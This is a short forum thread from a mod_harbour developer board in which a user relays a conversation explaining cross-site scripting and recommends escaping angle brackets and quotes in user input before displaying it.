cross-site scripting

mod_harbour is an Apache module that allows to run PRGs directly on the web !!!
Post Reply
User avatar
Otto
Posts: 4470
Joined: Fri Oct 07, 2005 7:07 pm
Contact:

cross-site scripting

Post by Otto »

After Skype session yesterday I was discussing some security aspects with Andreu.
Andreu helps me to understand some risks better. I am focused on the firewall but it seems also in programming we must be careful.

but we have to give a security concept to mod harbour starters

Andreu, 19:43
to be fair, I think for starting on the web it's far better to focus on things like XSS

what is XSS

cross-site scripting

it's a web security attack that goes like this:

on your website, you have an input for the user that will be visible to everyone – for example, a comment form on a blog post

and the server-side code used to store and display that comment doesn't escape the input

some malicious user could add input with scripts in the HTML, which could publish private data like cookies

you'd have to escape the input on the server so that it can't be rendered as a script when it's displayed

it's not an attack against the server, but against fellow users of the service

nowadays the web platform offers you tools so that you can block scripts without actually having to escape the input on the server-side

but while some of those are good, if you ask me the complete package is more trouble than just escaping every input
********************************************************************
mod harbour - Vamos a la conquista de la Web
modharbour.org

********************************************************************
User avatar
Otto
Posts: 4470
Joined: Fri Oct 07, 2005 7:07 pm
Contact:

Re: cross-site scripting

Post by Otto »

In order to write an < sign in HTML that doesn't start a tag, you write it <
Same with > and >
If you're writing code to render an attribute in a tag, you can escape a quote with &apos; (single quote) or " (double quote)
Just that should be enough
Replace those in any input you're printing
********************************************************************
mod harbour - Vamos a la conquista de la Web
modharbour.org

********************************************************************
Post Reply